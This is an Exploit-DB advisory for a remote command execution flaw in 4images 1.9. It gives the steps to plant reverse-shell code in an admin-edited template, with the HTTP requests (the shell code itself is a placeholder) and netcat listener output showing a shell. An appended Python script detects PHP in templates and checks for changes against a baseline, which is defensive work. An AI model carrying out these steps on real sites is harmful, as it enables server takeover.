4images 1.9 – Remote Command Execution (RCE)

  • Author: Andrey Stoykov
    Date: 2023-03-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51147/
# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04


To reproduce do the following:

1. Log in as an administrator user
2. Browse to "General" -> "Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=1"


// HTTP POST request showing reverse shell payload

POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]

__csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...]


// HTTP GET request that renders the modified template

GET /4images/categories.php?cat_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
[...]


# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux
 13:54:28 up 2:18,  2 users,  load average: 0.09, 0.68, 0.56
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali     tty7     :0               11:58    2:18m  2:21   0.48s xfce4-session
kali     pts/1    -                11:58    1:40  24.60s  0.14s sudo su
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
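A defender's check for this class of change, added here as an example that is neither part of the advisory nor 4images' own code: it flags PHP markers inside .html templates and diffs a template pack against a recorded baseline, so an edit saved through admin/templates.php (as in the "Save Changes" step above) stands out even if the marker regexes miss it. It assumes template packs are plain files under templates/<pack>/ (not stated on the page) and runs against a constructed sample pack.

```python
import hashlib
import os
import re
import tempfile

# PHP markers that have no business in a 4images .html template. Assumption (not on
# the page): packs live under templates/<pack>/ and admin/templates.php writes to them.
SUSPICIOUS = [re.compile(r"<\?php", re.I), re.compile(r"<\?="),
              re.compile(r"<script[^>]+language\s*=\s*['\"]?php", re.I)]

def template_files(root):
    """Relative paths of every .html template below root, in stable order."""
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.endswith(".html"):
                yield os.path.relpath(os.path.join(dirpath, name), root)

def scan_templates(root):
    """(relative_path, pattern) for each template that embeds PHP code."""
    findings = []
    for rel in template_files(root):
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        hit = next((p.pattern for p in SUSPICIOUS if p.search(text)), None)
        if hit:
            findings.append((rel, hit))
    return findings

def baseline(root):
    """relative_path -> sha256 of a known-good template pack."""
    out = {}
    for rel in template_files(root):
        with open(os.path.join(root, rel), "rb") as fh:
            out[rel] = hashlib.sha256(fh.read()).hexdigest()
    return out

def changed(root, known):
    # Templates whose hash differs from the baseline (edited or newly added).
    return sorted(rel for rel, h in baseline(root).items() if known.get(rel) != h)

def demo():
    # Constructed sample pack: record a baseline, then alter categories.html the
    # way the advisory's "Save Changes" step does, and run both checks.
    with tempfile.TemporaryDirectory() as root:
        pack = os.path.join(root, "default_960px")
        os.makedirs(pack)
        with open(os.path.join(pack, "categories.html"), "w") as fh:
            fh.write("<html><body>{site_name}</body></html>\n")
        known = baseline(root)
        with open(os.path.join(pack, "categories.html"), "w") as fh:
            fh.write('<html><body><?php echo "x"; ?></body></html>\n')
        return scan_templates(root), changed(root, known)
```

Run `baseline()` once on a freshly installed pack and keep the result outside the web root; `changed()` then reports any template touched since, which is the signal to inspect the admin session that saved it.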